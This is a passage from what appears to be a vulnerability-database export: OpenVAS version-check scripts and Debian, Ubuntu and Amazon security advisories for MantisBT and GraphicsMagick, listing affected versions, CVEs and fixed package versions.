free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = 'cpe:/a:mantisbt:mantisbt';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142412\");\n script_version(\"2019-05-15T08:52:57+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-15 08:52:57 +0000 (Wed, 15 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-15 08:51:30 +0000 (Wed, 15 May 2019)\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n\n script_cve_id(\"CVE-2018-17782\", \"CVE-2018-17783\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"MantisBT < 2.17.2 Multiple XSS Vulnerabilities - Windows\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"mantis_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"mantisbt/detected\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"MantisBT is prone to multiple cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"MantisBT is prone to multiple cross-site scripting vulnerabilities:\n\n - XSS vulnerability in the Manage Filters page (CVE-2018-17782)\n\n - XSS vulnerability in the Edit Filter page (CVE-2018-17783)\");\n\n script_tag(name:\"affected\", value:\"MantisBT 2.1.0 through 2.17.1.\");\n\n script_tag(name:\"solution\", value:\"Update to version 2.17.2 or later.\");\n\n script_xref(name:\"URL\", value:\"https://mantisbt.org/blog/archives/mantisbt/613\");\n script_xref(name:\"URL\", value:\"https://mantisbt.org/bugs/view.php?id=24813\");\n script_xref(name:\"URL\", value:\"https://mantisbt.org/bugs/view.php?id=24814\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_in_range(version: version, test_version: \"2.1.0\", test_version2: \"2.17.1\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.17.2\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-07-04T18:55:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13063", "CVE-2017-17783", "CVE-2017-17915", "CVE-2017-10794", "CVE-2017-15277", "CVE-2017-14997", "CVE-2017-17913", "CVE-2017-11641", "CVE-2017-13777", "CVE-2017-10799", "CVE-2017-13775", "CVE-2018-6799", "CVE-2017-17502", "CVE-2017-13737", "CVE-2017-11722", "CVE-2017-18220", "CVE-2017-12936", "CVE-2017-17498", "CVE-2017-18229", "CVE-2017-13776", "CVE-2017-14314", "CVE-2017-11636", "CVE-2017-11638", "CVE-2017-17782", "CVE-2017-16352", "CVE-2017-17503", "CVE-2017-18231", "CVE-2017-11102", "CVE-2017-18230", "CVE-2017-14994", "CVE-2017-16547", "CVE-2017-15238", "CVE-2017-11643", "CVE-2017-11403", "CVE-2017-15930", "CVE-2017-18219", "CVE-2017-11139", "CVE-2017-17500", "CVE-2017-14504", "CVE-2017-10800", "CVE-2018-9018", "CVE-2017-13065", "CVE-2017-13134", "CVE-2017-11642", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-14733", "CVE-2017-11140", "CVE-2017-16545", "CVE-2017-12937", "CVE-2017-12935", "CVE-2017-17501", "CVE-2018-5685", "CVE-2017-13064", "CVE-2017-17912", "CVE-2017-11637"], "description": "Several vulnerabilities have been discovered in GraphicsMagick, a set of\ncommand-line applications to manipulate image files, which could result\nin denial of service or the execution of arbitrary code if malformed\nimage files are processed.", "modified": "2019-07-04T00:00:00", "published": "2018-10-16T00:00:00", "id": "OPENVAS:1361412562310704321", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704321", "type": "openvas", "title": "Debian Security Advisory DSA 4321-1 (graphicsmagick - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4321-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704321\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2017-10794\", \"CVE-2017-10799\", \"CVE-2017-10800\", \"CVE-2017-11102\", \"CVE-2017-11139\",\n \"CVE-2017-11140\", \"CVE-2017-11403\", \"CVE-2017-11636\", \"CVE-2017-11637\", \"CVE-2017-11638\",\n \"CVE-2017-11641\", \"CVE-2017-11642\", \"CVE-2017-11643\", \"CVE-2017-11722\", \"CVE-2017-12935\",\n \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\",\n \"CVE-2017-13134\", \"CVE-2017-13737\", \"CVE-2017-13775\", \"CVE-2017-13776\", \"CVE-2017-13777\",\n \"CVE-2017-14314\", \"CVE-2017-14504\", \"CVE-2017-14733\", \"CVE-2017-14994\", \"CVE-2017-14997\",\n \"CVE-2017-15238\", \"CVE-2017-15277\", \"CVE-2017-15930\", \"CVE-2017-16352\", \"CVE-2017-16353\",\n \"CVE-2017-16545\", \"CVE-2017-16547\", \"CVE-2017-16669\", \"CVE-2017-17498\", \"CVE-2017-17500\",\n \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-17782\", \"CVE-2017-17783\",\n \"CVE-2017-17912\", \"CVE-2017-17913\", \"CVE-2017-17915\", \"CVE-2017-18219\", \"CVE-2017-18220\",\n \"CVE-2017-18229\", \"CVE-2017-18230\", \"CVE-2017-18231\", \"CVE-2018-5685\", \"CVE-2018-6799\",\n \"CVE-2018-9018\");\n script_name(\"Debian Security Advisory DSA 4321-1 (graphicsmagick - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-16 00:00:00 +0200 (Tue, 16 Oct 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4321.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"graphicsmagick on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 1.3.30+hg15796-1~deb9u1.\n\nWe recommend that you upgrade your graphicsmagick packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/graphicsmagick\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in GraphicsMagick, a set of\ncommand-line applications to manipulate image files, which could result\nin denial of service or the execution of arbitrary code if malformed\nimage files are processed.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-dbg\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-imagemagick-compat\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-libmagick-dev-compat\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphics-magick-perl\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick++-q16-12\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick++1-dev\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick-q16-3\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick1-dev\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T20:09:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13063", "CVE-2017-17915", "CVE-2017-17502", "CVE-2017-17498", "CVE-2017-14314", "CVE-2017-11636", "CVE-2017-17782", "CVE-2016-3716", "CVE-2017-17503", "CVE-2017-11643", "CVE-2016-5241", "CVE-2016-7447", "CVE-2017-17500", "CVE-2016-3718", "CVE-2017-13065", "CVE-2017-13134", "CVE-2016-7448", "CVE-2016-3717", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-14733", "CVE-2017-12937", "CVE-2017-17501", "CVE-2017-13064", "CVE-2017-17912", "CVE-2016-7446", "CVE-2016-7449"], "description": "Various security issues were discovered in Graphicsmagick, a collection\nof image processing tools. Heap-based buffer overflows or overreads may\nlead to a denial of service or disclosure of in-memory information or\nother unspecified impact by processing a malformed image file.", "modified": "2020-01-29T00:00:00", "published": "2018-07-10T00:00:00", "id": "OPENVAS:1361412562310891401", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891401", "type": "openvas", "title": "Debian LTS: Security Advisory for graphicsmagick (DLA-1401-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891401\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\", \"CVE-2016-5241\", \"CVE-2016-7446\",\n \"CVE-2016-7447\", \"CVE-2016-7448\", \"CVE-2016-7449\", \"CVE-2017-11636\", \"CVE-2017-11643\",\n \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13134\",\n \"CVE-2017-14314\", \"CVE-2017-14733\", \"CVE-2017-16353\", \"CVE-2017-16669\", \"CVE-2017-17498\",\n \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-17782\",\n \"CVE-2017-17912\", \"CVE-2017-17915\");\n script_name(\"Debian LTS: Security Advisory for graphicsmagick (DLA-1401-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-07-10 00:00:00 +0200 (Tue, 10 Jul 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/06/msg00009.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_tag(name:\"affected\", value:\"graphicsmagick on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n1.3.20-3+deb8u3.\n\nWe recommend that you upgrade your graphicsmagick packages.\");\n\n script_tag(name:\"summary\", value:\"Various security issues were discovered in Graphicsmagick, a collection\nof image processing tools. Heap-based buffer overflows or overreads may\nlead to a denial of service or disclosure of in-memory information or\nother unspecified impact by processing a malformed image file.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-dbg\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-imagemagick-compat\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-libmagick-dev-compat\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphics-magick-perl\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick++1-dev\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick++3\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick1-dev\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick3\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:33:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-17783", "CVE-2017-17915", "CVE-2017-17913", "CVE-2017-11641", "CVE-2017-13147", "CVE-2017-11636", "CVE-2017-17782", "CVE-2017-11102", "CVE-2017-11643", "CVE-2017-11139", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-11140", "CVE-2017-17912", "CVE-2017-11637"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-02-01T00:00:00", "id": "OPENVAS:1361412562310874084", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874084", "type": "openvas", "title": "Fedora Update for GraphicsMagick FEDORA-2018-7c61d08c4f", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_7c61d08c4f_GraphicsMagick_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for GraphicsMagick FEDORA-2018-7c61d08c4f\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874084\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-02-01 07:56:43 +0100 (Thu, 01 Feb 2018)\");\n script_cve_id(\"CVE-2017-17912\", \"CVE-2017-17913\", \"CVE-2017-17915\", \"CVE-2017-17783\",\n \"CVE-2017-17782\", \"CVE-2017-16353\", \"CVE-2017-16669\", \"CVE-2017-13147\",\n \"CVE-2017-11643\", \"CVE-2017-11641\", \"CVE-2017-11636\", \"CVE-2017-11637\",\n \"CVE-2017-11140\", \"CVE-2017-11139\", \"CVE-2017-11102\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for GraphicsMagick FEDORA-2018-7c61d08c4f\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'GraphicsMagick'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"GraphicsMagick on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-7c61d08c4f\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M7ZZRPUL2DNIAIFTNGOFAV2VTBMMSRXA\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"GraphicsMagick\", rpm:\"GraphicsMagick~1.3.28~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:39:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-17783", "CVE-2017-17502", "CVE-2017-17498", "CVE-2017-17782", "CVE-2017-17503", "CVE-2017-16547", "CVE-2017-17500", "CVE-2017-16669", "CVE-2017-16545", "CVE-2017-17501"], "description": "It was discovered that GraphicsMagick incorrectly handled certain image files. \nAn attacker could possibly use this issue to cause a denial of service or other \nunspecified impact.", "edition": 2, "modified": "2020-01-22T00:00:00", "published": "2020-01-22T00:00:00", "id": "USN-4248-1", "href": "https://ubuntu.com/security/notices/USN-4248-1", "title": "GraphicsMagick vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-08-12T01:01:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-13063", "CVE-2017-17783", "CVE-2017-17915", "CVE-2017-10794", "CVE-2017-15277", "CVE-2017-14997", "CVE-2017-17913", "CVE-2017-11641", "CVE-2017-13777", "CVE-2017-10799", "CVE-2017-13775", "CVE-2018-6799", "CVE-2017-17502", "CVE-2017-13737", "CVE-2017-11722", "CVE-2017-18220", "CVE-2017-12936", "CVE-2017-17498", "CVE-2017-18229", "CVE-2017-13776", "CVE-2017-14314", "CVE-2017-11636", "CVE-2017-11638", "CVE-2017-17782", "CVE-2017-16352", "CVE-2017-17503", "CVE-2017-18231", "CVE-2017-11102", "CVE-2017-18230", "CVE-2017-14994", "CVE-2017-16547", "CVE-2017-15238", "CVE-2017-11643", "CVE-2017-11403", "CVE-2017-15930", "CVE-2017-18219", "CVE-2017-11139", "CVE-2017-17500", "CVE-2017-14504", "CVE-2017-10800", "CVE-2018-9018", "CVE-2017-13065", "CVE-2017-13134", "CVE-2017-11642", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-14733", "CVE-2017-11140", "CVE-2017-16545", "CVE-2017-12937", "CVE-2017-12935", "CVE-2017-17501", "CVE-2018-5685", "CVE-2017-13064", "CVE-2017-17912", "CVE-2017-11637"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4321-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nOctober 16, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : graphicsmagick\nCVE ID : CVE-2017-10794 CVE-2017-10799 CVE-2017-10800 CVE-2017-11102 \n CVE-2017-11139 CVE-2017-11140 CVE-2017-11403 CVE-2017-11636 \n CVE-2017-11637 CVE-2017-11638 CVE-2017-11641 CVE-2017-11642 \n CVE-2017-11643 CVE-2017-11722 CVE-2017-12935 CVE-2017-12936 \n CVE-2017-12937 CVE-2017-13063 CVE-2017-13064 CVE-2017-13065 \n CVE-2017-13134 CVE-2017-13737 CVE-2017-13775 CVE-2017-13776 \n CVE-2017-13777 CVE-2017-14314 CVE-2017-14504 CVE-2017-14733 \n CVE-2017-14994 CVE-2017-14997 CVE-2017-15238 CVE-2017-15277 \n CVE-2017-15930 CVE-2017-16352 CVE-2017-16353 CVE-2017-16545 \n CVE-2017-16547 CVE-2017-16669 CVE-2017-17498 CVE-2017-17500 \n CVE-2017-17501 CVE-2017-17502 CVE-2017-17503 CVE-2017-17782 \n CVE-2017-17783 CVE-2017-17912 CVE-2017-17913 CVE-2017-17915 \n CVE-2017-18219 CVE-2017-18220 CVE-2017-18229 CVE-2017-18230 \n CVE-2017-18231 CVE-2018-5685 CVE-2018-6799 CVE-2018-9018\n\nSeveral vulnerabilities have been discovered in GraphicsMagick, a set of\ncommand-line applications to manipulate image files, which could result\nin denial of service or the execution of arbitrary code if malformed\nimage files are processed.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 1.3.30+hg15796-1~deb9u1.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFor the detailed security status of graphicsmagick please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/graphicsmagick\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 14, "modified": "2018-10-16T22:07:08", "published": "2018-10-16T22:07:08", "id": "DEBIAN:DSA-4321-1:D5514", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00252.html", "title": "[SECURITY] [DSA 4321-1] graphicsmagick security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-11T01:29:42", "bulletinFamily": "unix", "cvelist": ["CVE-2017-13063", "CVE-2017-17915", "CVE-2017-17502", "CVE-2017-17498", "CVE-2017-14314", "CVE-2017-11636", "CVE-2017-17782", "CVE-2016-3716", "CVE-2017-17503", "CVE-2017-11643", "CVE-2016-5241", "CVE-2016-7447", "CVE-2017-17500", "CVE-2016-3718", "CVE-2017-13065", "CVE-2017-13134", "CVE-2016-7448", "CVE-2016-3717", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-14733", "CVE-2017-12937", "CVE-2017-17501", "CVE-2017-13064", "CVE-2017-17912", "CVE-2016-7446", "CVE-2016-7449"], "description": "Package : graphicsmagick\nVersion : 1.3.20-3+deb8u3\nCVE ID : CVE-2016-3716 CVE-2016-3717 CVE-2016-3718 CVE-2016-5241\n CVE-2016-7446 CVE-2016-7447 CVE-2016-7448 CVE-2016-7449\n CVE-2017-11636 CVE-2017-11643 CVE-2017-12937\n CVE-2017-13063 CVE-2017-13064 CVE-2017-13065\n CVE-2017-13134 CVE-2017-14314 CVE-2017-14733\n CVE-2017-16353 CVE-2017-16669 CVE-2017-17498\n CVE-2017-17500 CVE-2017-17501 CVE-2017-17502\n CVE-2017-17503 CVE-2017-17782 CVE-2017-17912\n CVE-2017-17915\nDebian Bug : 870149 870157 872574 873130 873129 873119 873099 881524\n 881391 884905\n\nVarious security issues were discovered in Graphicsmagick, a collection\nof image processing tools. Heap-based buffer overflows or overreads may\nlead to a denial of service or disclosure of in-memory information or\nother unspecified impact by processing a malformed image file.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n1.3.20-3+deb8u3.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 10, "modified": "2018-06-27T21:28:53", "published": "2018-06-27T21:28:53", "id": "DEBIAN:DLA-1401-1:A41C0", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201806/msg00009.html", "title": "[SECURITY] [DLA 1401-1] graphicsmagick security update", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:37:50", "bulletinFamily": "unix", "cvelist": ["CVE-2017-17783", "CVE-2017-17915", "CVE-2017-17913", "CVE-2017-11641", "CVE-2017-13147", "CVE-2017-11636", "CVE-2017-17782", "CVE-2017-11102", "CVE-2017-11643", "CVE-2017-11139", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-11140", "CVE-2018-5685", "CVE-2017-17912", "CVE-2017-11637"], "description": "**Issue Overview:**\n\nMemory information disclosure in DescribeImage function in magick/describe.c \nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in the DescribeImage function of the magick/describe.c file, because of a heap-based buffer over-read. The portion of the code containing the vulnerability is responsible for printing the IPTC Profile information contained in the image. This vulnerability can be triggered with a specially crafted MIFF file. There is an out-of-bounds buffer dereference because certain increments are never checked. ([CVE-2017-16353 __](<https://access.redhat.com/security/cve/CVE-2017-16353>) )\n\nGraphicsMagick 1.3.26 has double free vulnerabilities in the ReadOneJNGImage() function in coders/png.c ([CVE-2017-11139 __](<https://access.redhat.com/security/cve/CVE-2017-11139>))\n\nIn GraphicsMagick there is a stack-based buffer over-read in WriteWEBPImage in coders/webp.c, related to an incompatibility with libwebp versions, 0.5.0 and later, that use a different structure type. ([CVE-2017-17913 __](<https://access.redhat.com/security/cve/CVE-2017-17913>))\n\nIn GraphicsMagick 1.3.27, there is an infinite loop and application hang in the ReadBMPImage function (coders/bmp.c). Remote attackers could leverage this vulnerability to cause a denial of service via an image file with a crafted bit-field mask value. ([CVE-2018-5685 __](<https://access.redhat.com/security/cve/CVE-2018-5685>))\n\nThe ReadJPEGImage function in coders/jpeg.c in GraphicsMagick 1.3.26 creates a pixel cache before a successful read of a scanline, which allows remote 